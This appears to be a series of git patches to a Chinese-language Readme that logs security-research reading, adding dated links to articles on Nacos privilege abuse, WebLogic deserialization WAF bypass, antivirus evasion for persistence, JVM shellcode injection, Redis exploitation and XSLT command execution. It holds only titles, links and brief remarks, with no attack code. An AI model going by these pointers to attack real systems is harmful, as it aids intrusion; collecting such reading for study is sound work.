"java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index db8701a..dd3a96a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -237,3 +237,4 @@ ## 2023 + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** + 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** ++ 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** From 027907f5030360b5a5931aa76146f86673d4b566 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 8 Jan 2023 12:58:13 +0800 Subject: [PATCH 241/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dd3a96a..6abcd75 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -238,3 +238,4 @@ + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** + 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** + 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** ++ 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 4ffc6062320dfec42e32b3cd4c2085057a8da64c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 8 Jan 2023 15:36:02 +0800 Subject: [PATCH 242/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6abcd75..b00662c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -239,3 +239,4 @@ + 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** + 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** + 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) From 3447aabfc31e1387637e5714a78ba6d6921f1fc6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 8 Jan 2023 22:06:36 +0800 Subject: [PATCH 243/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b00662c..5eac817 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -240,3 +240,4 @@ + 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** + 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) ++ 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** From a47eca2bf38bf0fe3859626c0d1b6aa69d0a8986 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 Jan 2023 19:25:40 +0800 Subject: [PATCH 244/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5eac817..42c3703 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -241,3 +241,4 @@ + 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) + 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** ++ 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** From 492fea085d8fc25314e9f6842c0b06defb20156f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 Jan 2023 19:31:44 +0800 Subject: [PATCH 245/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 42c3703..92a0bac 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -242,3 +242,4 @@ + 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) + 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** + 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** ++ 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** From 7b5746db08c0ff9e249a5211751cc8a0ddd137d5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 Jan 2023 13:07:24 +0800 Subject: [PATCH 246/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 92a0bac..c244a14 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -243,3 +243,4 @@ + 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** + 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** + 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** ++ 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** From 48388de1dd14e9ed247b7479091471ab5a2ffdb3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 Jan 2023 15:00:27 +0800 Subject: [PATCH 247/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c244a14..2db8cc4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -244,3 +244,4 @@ + 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** + 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** ++ 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** From 29282c0611bcaac3f9a68f98850115175f842c82 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 Jan 2023 19:57:19 +0800 Subject: [PATCH 248/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2db8cc4..55dbdf9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -245,3 +245,4 @@ + 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** ++ 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** From ca66b589a30f06cee34ec0dac038910dfaf92ca7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 11 Jan 2023 13:33:12 +0800 Subject: [PATCH 249/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 55dbdf9..bf7acba 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -246,3 +246,4 @@ + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** ++ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) From 9593ba940a081aaeec14cea2c7063106a0f5e9e7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 11 Jan 2023 13:36:36 +0800 Subject: [PATCH 250/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bf7acba..1d481af 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -246,4 +246,4 @@ + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** -+ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) ++ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) From 79776e236d7469e433b800ec4169ed1815ccb570 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 13 Jan 2023 20:45:41 +0800 Subject: [PATCH 251/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1d481af..5cd40c4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -247,3 +247,4 @@ + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** + 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) ++ 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** From d26fd31e43c6986fb6450f6e247b21cff20efcd1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 14 Jan 2023 13:35:29 +0800 Subject: [PATCH 252/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5cd40c4..fa856a2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -248,3 +248,4 @@ + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** + 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) + 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** ++ 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) From 191e6674e4a3993acc1a01c8081712e70ee10d2a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 16 Jan 2023 22:15:51 +0800 Subject: [PATCH 253/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index fa856a2..3606571 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -249,3 +249,4 @@ + 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) + 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** + 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) ++ 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** From 1be80eadba1f76a4eb84f4abf2b07e5696500e67 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 20:44:55 +0800 Subject: [PATCH 254/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3606571..c207098 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -250,3 +250,4 @@ + 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** + 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) + 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** ++ 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) From 67c2289b0cb2eb372d11a8e329ed26d38e1db2a7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 20:50:12 +0800 Subject: [PATCH 255/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c207098..ff05aa6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -251,3 +251,4 @@ + 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) + 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) ++ 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** From cc0aabe127367c713599492f11724ee386d0a750 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 21:24:24 +0800 Subject: [PATCH 256/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ff05aa6..d65ef33 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -252,3 +252,4 @@ + 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) + 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** ++ 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** From ac0e8d7063b6359c970cb4ac945aaaf57a662d0c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 21:48:25 +0800 Subject: [PATCH 257/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d65ef33..e6b61d1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -253,3 +253,4 @@ + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) + 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** + 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** ++ 2023/1/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** From ec1cb285491fd139f59d213a37d4345441ac661e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 18 Jan 2023 11:20:02 +0800 Subject: [PATCH 258/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e6b61d1..9768ff0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -253,4 +253,5 @@ + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) + 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** + 2023/01/17 [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s?__biz=Mzg4MzY5NjIyMg==&mid=2247483755&idx=1&sn=4e9ae8be2a0950ecfe99281689001e06&chksm=cf42365af835bf4ceb041fdbbb108cffbfbef253f41d9197760e11f774749eeb1e721f070fd8&mpshare=1&scene=23&srcid=0117LLaambwHZZNnlAY1Pqnm&sharer_sharetime=1673954336737&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **np 学习** -+ 2023/1/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** ++ 2023/01/17 [XSLT 调用 Java 的类方法](https://yanbin.blog/xslt-call-java-method/) [XSLT Injection](https://vulncat.fortify.com/zh-cn/detail?id=desc.dataflow.java.xslt_injection) **xslt 命令执行** ++ 2023/01/18 